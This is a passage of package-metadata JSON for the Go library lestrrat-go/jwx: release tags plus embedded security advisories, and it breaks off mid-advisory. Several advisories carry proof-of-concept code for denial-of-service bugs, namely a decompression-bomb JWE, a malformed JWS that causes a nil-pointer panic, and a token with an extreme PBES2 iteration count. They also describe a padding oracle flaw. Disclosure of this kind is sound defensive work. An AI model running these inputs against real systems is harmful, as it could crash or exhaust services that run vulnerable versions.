/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-05-31T15:12:08.692Z","dependent_packages_count":439,"downloads":null,"downloads_period":null,"dependent_repos_count":301,"rankings":{"downloads":null,"dependent_repos_count":0.3856595618475986,"dependent_packages_count":0.2835332832593982,"stargazers_count":1.7077355930234006,"forks_count":2.2597223748913744,"docker_downloads_count":0.20230146445511396,"average":0.9677904554953771},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2","advisories":[{"uuid":"GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y","url":"https://github.com/advisories/GHSA-hj3v-m684-v259","title":"JWX vulnerable to a denial of service attack using compressed JWE message","description":"### Summary\nThis vulnerability allows an attacker with a trusted public key to cause a Denial-of-Service (DoS) condition by crafting a malicious JSON Web Encryption (JWE) token with an exceptionally high compression ratio. When this token is processed by the recipient, it results in significant memory allocation and processing time during decompression.\n\n### Details\n\n**The attacker needs to obtain a valid public key to compress the payload**. It needs to be valid so that the recipient can use to successfully decompress the payload. Furthermore in context JWT processing in the v2 versions, the recipient must explicitly allow JWE handling .\n\nThe attacker then crafts a message with high compression ratio, e.g. a payload with very high frequency of repeating patterns that can decompress to a much larger size.  If the payload is large enough, recipient who is decompressing the data will have to allocate a large amount of memory, which then can lead to a denial of service.\n\nThe original report includes a reference to [1], but there are some very subtle differences between this library and the aforementioned issue. The most important aspect is that the referenced issue focuses on JWT processing, whereas this library is intentionally divided into parts that comprise JOSE, i.e. JWT, JWS, JWE, JWK. In particular, v2 of this library does not attempt to handle JWT payload enveloped in a JWE message automatically (v1 attempted to do this automatically, but it was never stable).\n\nReflecting this subtle difference, the approach taken to mitigate this vulnerability is slightly different from the referenced issue. The referenced issue limits the size of JWT when parsing, but the fixes for this library limits the maximum size of the decompressed data when decrypting JWE messages. Therefore the fix in this library is applicable regardless of the usage context, and a limit is now imposed on the size of the message that our JWE implementation can handle.\n\n### Proof of Concept\n\nModified from the original report to fit the vulnerability better:\n\n```go\n// The value below just needs to be \"large enough\" so that the it puts enough strain on the\n// recipient's environment. The value below is a safe size on my machine to run the test\n// without causing problems. When you increase the payload size, at some point the processing\n// will be slow enough to virtually freeze the program or cause a memory allocation error\nconst payloadSize = 1 \u003c\u003c 31\n\nprivkey, err := rsa.GenerateKey(rand.Reader, 2048)\nrequire.NoError(t, err, `rsa.GenerateKey should succeed`)\npubkey := \u0026privkey.PublicKey\npayload := strings.Repeat(\"x\", payloadSize)\n\nencrypted, err := jwe.Encrypt([]byte(payload), jwe.WithKey(jwa.RSA_OAEP, pubkey), jwe.WithContentEncryption(\"A128CBC-HS256\"), jwe.WithCompress(jwa.Deflate))\nrequire.NoError(t, err, `jwe.Encrypt should succeed`)\n_, err = jwe.Decrypt(encrypted, jwe.WithKey(jwa.RSA_OAEP, privkey)) // Will be allocating large amounts of memory\nrequire.Error(t, err, `jwe.Decrypt should fail`)\n```\n\n###  References\n\n[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-03-08T15:06:53.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H","references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-hj3v-m684-v259","https://github.com/lestrrat-go/jwx/commit/d01027d74c7376d66037a10f4f64af9af26a7e34","https://github.com/lestrrat-go/jwx/commit/d43f2ceb7f0c13714dfe8854d6439766e86faa76","https://nvd.nist.gov/vuln/detail/CVE-2024-28122","https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","https://github.com/advisories/GHSA-hj3v-m684-v259"],"source_kind":"github","identifiers":["GHSA-hj3v-m684-v259","CVE-2024-28122"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2024-03-08T16:04:55.517Z","updated_at":"2026-06-13T16:05:49.873Z","epss_percentage":0.0015,"epss_percentile":0.35548,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.29","vulnerable_version_range":"\u003c 1.2.29"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.21","vulnerable_version_range":"\u003c 2.0.21"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oajN2LW02ODQtdjI1Oc4AA52y/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So","url":"https://github.com/advisories/GHSA-pvcr-v8j8-j5q3","title":"Parsing JSON serialized payload without protected field can lead to segfault","description":"### Summary\n\nCalling `jws.Parse` with a JSON serialized payload where the `signature` field is present while `protected` is absent can lead to a nil pointer dereference.\n\n### Details\n\nThis seems to also affect other functions that calls `Parse` internally, like `jws.Verify`.\n\nMy understanding of these functions from the docs is that they are supposed to fail gracefully on invalid input and don't require any prior validation.\n\nBased on the stack trace in the PoC, the issue seems to be that the processing done in `jws/message.go:UnmarshalJSON()` assumes that if a `signature` field is present, then a `protected` field is also present. If this is not the case, then the subsequent call to `getB64Value(sig.protected)` will dereference `sig.protected`, which is `nil`.\n\n### PoC\n\nReproducer:\n\n```go\npackage poc\n\nimport (\n        \"testing\"\n\n        \"github.com/lestrrat-go/jwx/v2/jws\"\n)\n\nfunc TestPOC(t *testing.T) {\n        _, _ = jws.Parse([]byte(`{\"signature\": \"\"}`))\n}\n```\n\nResult:\n\n```\n$ go test        \n--- FAIL: TestPOC (0.00s)\npanic: runtime error: invalid memory address or nil pointer dereference [recovered]\n        panic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x40 pc=0x5fd618]\n\ngoroutine 6 [running]:\ntesting.tRunner.func1.2({0x628800, 0x831030})\n        /usr/local/go/src/testing/testing.go:1545 +0x238\ntesting.tRunner.func1()\n        /usr/local/go/src/testing/testing.go:1548 +0x397\npanic({0x628800?, 0x831030?})\n        /usr/local/go/src/runtime/panic.go:914 +0x21f\ngithub.com/lestrrat-go/jwx/v2/jws.getB64Value({0x0?, 0x0?})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:484 +0x18\ngithub.com/lestrrat-go/jwx/v2/jws.(*Message).UnmarshalJSON(0xc0000a2140, {0xc0000ec000, 0x11, 0x200})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/message.go:323 +0x4ad\nencoding/json.(*decodeState).object(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0x16?})\n        /usr/local/go/src/encoding/json/decode.go:604 +0x6cc\nencoding/json.(*decodeState).value(0xc0000ea028, {0x64fa60?, 0xc0000a2140?, 0xc00006e630?})\n        /usr/local/go/src/encoding/json/decode.go:374 +0x3e\nencoding/json.(*decodeState).unmarshal(0xc0000ea028, {0x64fa60?, 0xc0000a2140?})\n        /usr/local/go/src/encoding/json/decode.go:181 +0x133\nencoding/json.(*Decoder).Decode(0xc0000ea000, {0x64fa60, 0xc0000a2140})\n        /usr/local/go/src/encoding/json/stream.go:73 +0x179\ngithub.com/lestrrat-go/jwx/v2/internal/json.Unmarshal({0xc00001a288, 0x11, 0x11}, {0x64fa60, 0xc0000a2140})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/internal/json/json.go:26 +0x97\ngithub.com/lestrrat-go/jwx/v2/jws.parseJSON({0xc00001a288, 0x11, 0x11})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:588 +0x50\ngithub.com/lestrrat-go/jwx/v2/jws.Parse({0xc00001a288, 0x11, 0x11}, {0x0?, 0xc00006e760?, 0x48450f?})\n        /home/fredrik/go/pkg/mod/github.com/lestrrat-go/jwx/v2@v2.0.18/jws/jws.go:525 +0x89\npoc.TestPOC(0x0?)\n        /home/fredrik/src/jwx_poc/poc_test.go:10 +0x57\ntesting.tRunner(0xc0000e4340, 0x68ef30)\n        /usr/local/go/src/testing/testing.go:1595 +0xff\ncreated by testing.(*T).Run in goroutine 1\n        /usr/local/go/src/testing/testing.go:1648 +0x3ad\nexit status 2\nFAIL    poc     0.005s\n```\n\n### Impact\n\nThe vulnerability can be used to crash / DOS a system doing JWS verification.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-01-09T16:18:48.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L","references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-pvcr-v8j8-j5q3","https://github.com/lestrrat-go/jwx/commit/0e8802ce6842625845d651456493e7c87625601f","https://github.com/lestrrat-go/jwx/commit/d69a721931a5c48b9850a42404f18e143704adcd","https://nvd.nist.gov/vuln/detail/CVE-2024-21664","https://github.com/lestrrat-go/jwx/commit/8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","https://github.com/advisories/GHSA-pvcr-v8j8-j5q3"],"source_kind":"github","identifiers":["GHSA-pvcr-v8j8-j5q3","CVE-2024-21664"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2024-01-09T17:05:52.411Z","updated_at":"2026-06-13T16:06:18.563Z","epss_percentage":0.00178,"epss_percentile":0.39415,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.28","vulnerable_version_range":"\u003e= 1.0.8, \u003c 1.2.28"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.19","vulnerable_version_range":"\u003c 2.0.19"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1wdmNyLXY4ajgtajVxM84AA4So/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA","url":"https://github.com/advisories/GHSA-7f9x-gw85-8grf","title":"lestrrat-go/jwx's malicious parameters in JWE can cause a DOS","description":"### Summary\ntoo high p2c parameter in JWE's alg PBES2-* could lead to a DOS attack\n\n### Details\nThe JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource- intensive.\nTherefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack\n\n### PoC\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/lestrrat-go/jwx/v2/jwa\"\n\t\"github.com/lestrrat-go/jwx/v2/jwe\"\n\t\"github.com/lestrrat-go/jwx/v2/jwk\"\n)\n\nfunc main() {\n\ttoken := []byte(\"eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA\")\n\tkey, err := jwk.FromRaw([]byte(`abcdefg`))\n\tpayload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))\n\tif err == nil {\n\t\tfmt.Println(string(payload))\n\t}\n}\n\n```\n\n### Impact\nIt's a kind of Dos attack, the user's environment could potentially utilize an excessive amount of CPU resources.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2023-12-05T23:29:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","references":["https://github.com/lestrrat-go/jwx/security/advisories/GHSA-7f9x-gw85-8grf","https://nvd.nist.gov/vuln/detail/CVE-2023-49290","https://github.com/lestrrat-go/jwx/commit/64f2a229b8e18605f47361d292b526bdc4aee01c","https://github.com/advisories/GHSA-7f9x-gw85-8grf"],"source_kind":"github","identifiers":["GHSA-7f9x-gw85-8grf","CVE-2023-49290"],"repository_url":"https://github.com/lestrrat-go/jwx","blast_radius":0.0,"created_at":"2023-12-06T00:05:57.535Z","updated_at":"2026-05-28T19:10:01.956Z","epss_percentage":0.00183,"epss_percentile":0.4027,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA","packages":[{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx/v2","versions":[{"first_patched_version":"2.0.18","vulnerable_version_range":"\u003c 2.0.18"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx%2Fv2"},{"ecosystem":"go","package_name":"github.com/lestrrat-go/jwx","versions":[{"first_patched_version":"1.2.27","vulnerable_version_range":"\u003c 1.2.27"}],"purl":"pkg:go/github.com%2Flestrrat-go%2Fjwx"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1ybTh2LW14ajMtNXJtcc4AAz3K","url":"https://github.com/advisories/GHSA-rm8v-mxj3-5rmq","title":"github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack","description":"### Summary\n\nDecrypting AES-CBC encrypted JWE has Potential Padding Oracle Attack Vulnerability.\n\n### Details\n\nOn [v2.0.10](https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10), decrypting AES-CBC encrypted JWE may return an error \"failed to generate plaintext from decrypted blocks: invalid padding\":\n\nhttps://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213\n\nReporting padding error causes [Padding Oracle Attack](https://en.wikipedia.org/wiki/Padding_oracle_attack) Vulnerability.\nRFC 7516 JSON Web Encryption (JWE) says that we **MUST NOT** do this.\n\n\u003e 11.5.  Timing Attacks\n\u003e To mitigate the attacks described in RFC 3218 [RFC3218], the\n\u003e recipient MUST NOT distinguish between format, padding, and length\n\u003e errors of encrypted keys.  It is strongly recommended, in the event\n\u003e of receiving an improperly formatted key, that the recipient\n\u003e substitute a randomly generated CEK and proceed to the next step, to\n\u003e mitigate timing attacks.\n\nIn addition, the time to remove padding depends on the length of the padding.\nIt may leak the length of the padding by Timing Attacks.\n\nhttps://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66\n\nTo mitigate Timing Attacks, it MUST be done in constant time.\n\n### Impact\n\nThe authentication tag is 